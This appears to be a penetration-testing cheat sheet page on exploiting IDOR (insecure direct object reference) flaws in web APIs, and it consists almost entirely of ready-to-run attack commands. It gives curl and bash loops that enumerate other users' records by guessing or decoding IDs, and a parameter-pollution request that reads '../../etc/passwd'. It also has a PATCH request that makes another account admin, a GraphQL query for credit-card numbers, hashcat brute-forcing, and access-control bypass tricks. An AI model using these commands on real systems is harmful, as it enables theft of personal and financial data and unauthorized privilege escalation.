IDOR

Identifying IDORs

Simple Parameter Manipulation

# Numeric ID increment
curl -u user1:pass1 http://api.target.com/v1/users/123/profile
curl -u user1:pass1 http://api.target.com/v1/users/124/profile

# UUID/hash prediction
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440000/profile
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440001/profile

Parameter Pollution

# Multiple ID parameters
curl "http://target.com/download?file_id=legit123&file_id=admin456"
curl "http://target.com/api?user_id=valid123&user_id=victim789"

AJAX Calls

function changeUserPassword() {
    $.ajax({
        url:"change_password.php",
        type: "post",
        dataType: "json",
        data: {uid: user.uid, password: user.password, is_admin: is_admin},
        success:function(result){
            //
        }
    });
}

Understand Hashing/Encoding

$.ajax({
    url:"download.php",
    type: "post",
    dataType: "json",
    data: {filename: CryptoJS.MD5('file_1.pdf').toString()},
    success:function(result){
        //
    }
});

Compare User Roles

{
  "attributes" : 
    {
      "type" : "salary",
      "url" : "/services/data/salaries/users/1"
    },
  "Id" : "1",
  "Name" : "User1"

}

IDOR Enumeration

Basic ID Enumeration

Numeric ID Increment/Decrement

# Example: User profile access
curl "https://target.com/api/user/101"   # Valid request (your account)
curl "https://target.com/api/user/102"   # Check another user
curl "https://target.com/api/user/100"   # Check previous ID
curl "https://target.com/api/user/099"   # Leading zero test

UUID/GUID Manipulation

# Predictable UUIDs (v1/v2) can be brute-forced
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440000"
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440001"

Hash Cracking (If IDs Are Obfuscated)

# If IDs look like hashes (e.g., `d4d4d4d4`), try:
curl "https://target.com/api/doc/d4d4d4d4"  # Original
curl "https://target.com/api/doc/a1b2c3d4"  # Brute-force attempt

Parameter Fuzzing

Changing Parameter Names

# Try different parameter names:
curl "https://target.com/profile?id=100"
curl "https://target.com/profile?user_id=100"
curl "https://target.com/profile?uid=100"
curl "https://target.com/profile?account=100"

HTTP Parameter Pollution (HPP)

# Supply multiple parameters to confuse access control
curl "https://target.com/download?file=legit.pdf&file=../../etc/passwd"
curl "https://target.com/api?user=alice&user=bob"

Bypassing Encoded/Obscured IDs

Base64-Encoded IDs

# Example: /user/MTIz (where "MTIz" = Base64 of "123")
echo "123" | base64  # Returns "MTIz"
curl "https://target.com/api/user/MTIz"  # Original
curl "https://target.com/api/user/MTI0"  # Incremented (124)

for i in {100..110}; do 
    encoded=$(echo -n $i | base64 | tr -d '\n')
    curl -s "https://target.com/api/user/$encoded" | grep "email"
done

Hashed IDs (MD5, SHA1, etc.)

# If user_id looks like a hash (e.g., "5f4dcc3b5aa765d61d8327deb882cf99" = MD5("password"))
echo -n "101" | md5sum | cut -d' ' -f1  # Returns hash of "101"
curl "https://target.com/api/user/$(echo -n '102' | md5sum | cut -d' ' -f1)"

hashcat -m 0 -a 3 "5f4dcc3b5aa765d61d8327deb882cf99" ?d?d?d  # Brute-force 3-digit MD5

Custom Encoding (e.g., XOR, Bit-Shifting)

# If user_id=246 corresponds to real_id=118 (246 = 118*2 + 10)
real_id = (246 - 10) // 2  # Returns 118

IDOR in Insecure APIs

REST API IDOR

# Numeric ID increment
curl "https://api.target.com/v1/users/101"
curl "https://api.target.com/v1/users/102"

# UUID manipulation
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440000"
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440001"

# Using PUT/PATCH to modify other users
curl -X PATCH "https://api.target.com/v1/users/102" -d '{"role":"admin"}'

GraphQL IDOR

# Query other users' data
query {
  user(id: "encoded_user_id_here") {
    email
    creditCards { number }
  }
}

# Batch query attack
query {
  user1: user(id: "encoded_id_1") { email }
  user2: user(id: "encoded_id_2") { email }
}

SOAP API IDOR (XML)

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUserDetails>
      <userId>ENCODED_ID_HERE</userId>
    </GetUserDetails>
  </soap:Body>
</soap:Envelope>

Bypassing Protections

Swapping HTTP Methods

# If GET is blocked, try POST
curl -X POST "https://target.com/api/user/ENCODED_ID"

Adding Headers (API Key Spoofing)

curl -H "X-API-Key: 12345" "https://target.com/api/user/ENCODED_ID"

Parameter Pollution

# If `user_id` is checked, try `account_id`, `uid`, etc.
curl "https://target.com/api/data?user_id=VALID_ID&account_id=VICTIM_ID"

PreviousHttp Verb Tampering NextXXE

Last updated 7 months ago

hashtagIdentifying IDORs

hashtagSimple Parameter Manipulation

hashtagParameter Pollution

hashtagAJAX Calls

hashtagUnderstand Hashing/Encoding

hashtagCompare User Roles

hashtagIDOR Enumeration

hashtagBasic ID Enumeration

hashtagParameter Fuzzing

hashtagBypassing Encoded/Obscured IDs

hashtagBase64-Encoded IDs

hashtagHashed IDs (MD5, SHA1, etc.)

hashtagCustom Encoding (e.g., XOR, Bit-Shifting)

hashtagIDOR in Insecure APIs

hashtagREST API IDOR

hashtagGraphQL IDOR

hashtagSOAP API IDOR (XML)

hashtagBypassing Protections

hashtagSwapping HTTP Methods

hashtagAdding Headers (API Key Spoofing)

hashtagParameter Pollution

Identifying IDORs

Simple Parameter Manipulation

Parameter Pollution

AJAX Calls

Understand Hashing/Encoding

Compare User Roles

IDOR Enumeration

Basic ID Enumeration

Parameter Fuzzing

Bypassing Encoded/Obscured IDs

Base64-Encoded IDs

Hashed IDs (MD5, SHA1, etc.)

Custom Encoding (e.g., XOR, Bit-Shifting)

IDOR in Insecure APIs

REST API IDOR

GraphQL IDOR

SOAP API IDOR (XML)

Bypassing Protections

Swapping HTTP Methods

Adding Headers (API Key Spoofing)

Parameter Pollution